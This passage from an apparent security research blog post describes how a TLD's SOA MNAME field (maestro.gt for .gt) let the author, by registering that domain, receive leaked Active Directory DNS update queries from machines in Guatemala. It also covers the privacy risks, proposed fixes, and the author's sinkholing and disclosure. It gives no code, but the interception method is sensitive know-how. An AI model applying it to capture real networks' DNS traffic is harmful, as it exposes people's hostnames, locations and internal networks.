icann_name_collision_tableThe above table is from a ranked list of requested TLDs ordered by number of DNS requests to the roots (in thousands). The list in the report contains the top 100 TLDs in the original report but the above image truncates it to just 20. This table sheds some light on the raw number of leaked DNS requests actually hitting the roots that were never meant to end up there at all. As can be seen, requests for the invalid TLD of .local account for more requests to the DNS roots than all .org and .arpa requests combined – ranking as the 3rd most requested TLD overall! The following pie chart also sheds further light onto the scale of the problem:

icann_tld_breakdown_pie_chartThe above chart shows that a shocking 45% of requests to the root servers are for TLDs which do not exist and are likely the result of leaked DNS requests. Perhaps even more shocking is that the number is likely even higher due to the possibility of internal domains having a valid top level domain but an invalid second level domain, such as the previously mentioned microsoftinternal.com.gt. These requests would appear valid to the roots (since .gt is a valid record in the root zone) but would be revealed as leaked/invalid once they hit the com.gt TLD servers.

What’s also very interesting is that the report appears to mention that they observed traffic stemming from this problem but did not appear to investigate it much:

5.4.5 Name includes _ldap or _kerberos at the lowest level

Patterns observed show many requests of one of the forms:

  • _ldap._tcp.dc._msdcs.
  • _ldap._tcp.pdc._msdcs.
  • _ldap._tcp..\_sites.dc.\_msdcs.
  • _ldap._tcp..\_sites.gc.\_msdcs.
  • _ldap._tcp.._sites.
  • _ldap._tcp.
  • _kerberos._tcp.dc._msdcs.
  • _kerberos._tcp..\_sites.dc.\_msdcs.
  • _kerberos._tcp.._sites.
  • _kerberos._tcp.

Typically these are queries for SRV records, although sometimes they are requests for SOA

records. They appear to be related to Microsoft Active Directory services.

Look familiar? The above remark about SOA records is almost certainly traffic being generated from this exact same issue. It is mentioned again later in the report as well:

Although the overwhelming majority of the observed DNS traffic in this study has been name lookups (i.e., conventional queries), some other DNS requests have been detected. These are mostly Dynamic Updates—traffic that should never reach the root servers. After all, changes to the DNS root are not carried out using Dynamic Updates, let alone ones originating from random IP addresses on the Internet. The most likely explanation for this behavior would be misconfigured Active Directory installations that leak from an internal network to the public Internet. It should be noted however that this study did not examine the root cause of this traffic.

The statement eventually concludes with:

It is not known what impact, if any, this might have on the end client or how this could change its subsequent behavior. Currently, no significant harm appears to result when these Dynamic Update requests receive a REFUSED or NOTAUTH error response. Returning a referral response after example is delegated at the root might cause these clients to fail or behave unexpectedly. It seems likely that this would create end user confusion and support problems for the organization’s IT department.

Sadly this report doesn’t make any statements about the actual volume of this traffic so we’re unable to get a good idea of the percentage/total scale of this issue in comparison to other name collisions. The report also fails to realize that the security considerations are actually much larger in scope due to the fact that a SOA MNAME returned by TLDs could potentially be a completely arbitrary domain (as was the case with .gt and maestro.gt). This allows for potentially any attacker to get in the middle of these DNS transactions via a domain registration just as we exploited for .gt.

Given this admittedly limited information, I don’t think it’s a big reach to assume that this issue is actively occurring at-scale and many of the top level domain servers must see a non-trivial amount of traffic from this problem. Depending on the specific configuration of each TLD’s SOA record they may also be vulnerability to exploitation if their SOA MNAME is available for registration like the case was here.

Fixing the Problem & Wider TLD Security Considerations

Given that the barrier to entry for exploiting this problem is so low (essentially just buying a domain name), and the impact seems to be of concern for a number of reasons, I don’t feel it would be unreasonable to require TLDs to ensure that the SOA MNAME field of their responses be non-resolvable, or resolvable to a TLD-controlled server which refuses to process these dynamic update queries. Given that this mistake appears to be easy to make due to the SOA MNAME field not really being used for DNS-slave replication much anymore, I don’t feel this change should be too unreasonable. Sadly, if you review over the results of the generated TLD Health Report mentioned earlier in this post you’ll see that a shocking number of TLDs are actually very broken in the functional sense. Given this fact, the hope for enforcement of this security concern is low given that even simple things like “having all the TLD nameserver in a working state” are not currently universally true for TLDs. If we can’t even ensure that TLDs are healthy in general how can we ever hope to ensure that all TLDs are mitigating this issue?

Calling on network administrators to prevent issues of this type in their own networks does not appear to be a winnable war either given the scale of DNS name collisions. While it’s important to notify and ensure that network admins understand this risk, ensuring that 100% of networks always configure things properly is a bit of a pipe dream.

A Privacy Nightmare

Given the fact that these machines in Guatemala appear to call out on a pretty regular basis there are some fairly big privacy concerns with this issue. Many of the DNS requests had hostnames which were very personal in nature (think NANCY-PC, MYLAPTOP, etc). Since a DNS UPDATE query is sent due to a variety of triggers this would mean the user’s personal computer would be phoning home to my nameserver every time they travelled, changed networks, or rebooted their machine. This would make it easy to monitor someone as they take their laptop from work, to home, to the local cafe, and so on. The internal IP addresses add to the privacy risk as well, given that it helps map out the remote network’s IP scheme. All the while these people have no idea that their computer was silently reporting their location. Imagine something like the following being built based off of this data:

privacy-concern-exampleNote: The above map doesn’t reflect any real data and is purely for illustrative purposes.

Needless to say, the privacy concerns might raise a few eyebrows.

Ethical Handling of Research Data

Out of respect for the privacy of the people of the Guatemala the raw update query data collected from this research will never be published and has been securely deleted. Additionally, all further traffic from these computers will be routed to 127.0.53.53 to ensure that no further UPDATE queries will be sent for the rest of my maestro.gt domain registration term (of about two years). The IP address 127.0.53.53 is special because it was specifically commissioned by ICANN to warn network administrators of name collision issues. The hope being that if a network admin/tech savvy user in Guatemala sees DNS traffic being routed to this IP they will Google it and immediately find that their network/AD setup is vulnerable to this issue.

Additionally I’ve emailed the DNS admin of the .gt TLD informing her of this issue and asked that she change the MNAME to something no-longer resolvable. Since nobody else can abuse this, combined with the fact that I’m sinkholing all DNS traffic to 127.0.53.53, combined further with the fact that my domain registration term is two years – I’ve decided to publish this post despite the MNAME still being maestro.gt as of this time_._ I imagine that two years of time for a patch falls within reason for patch expectations :).

Overall this was a fun experiment and highlights some very interesting ramifications of even minor TLD misconfigurations such as this one.

Until next time,

-mandatory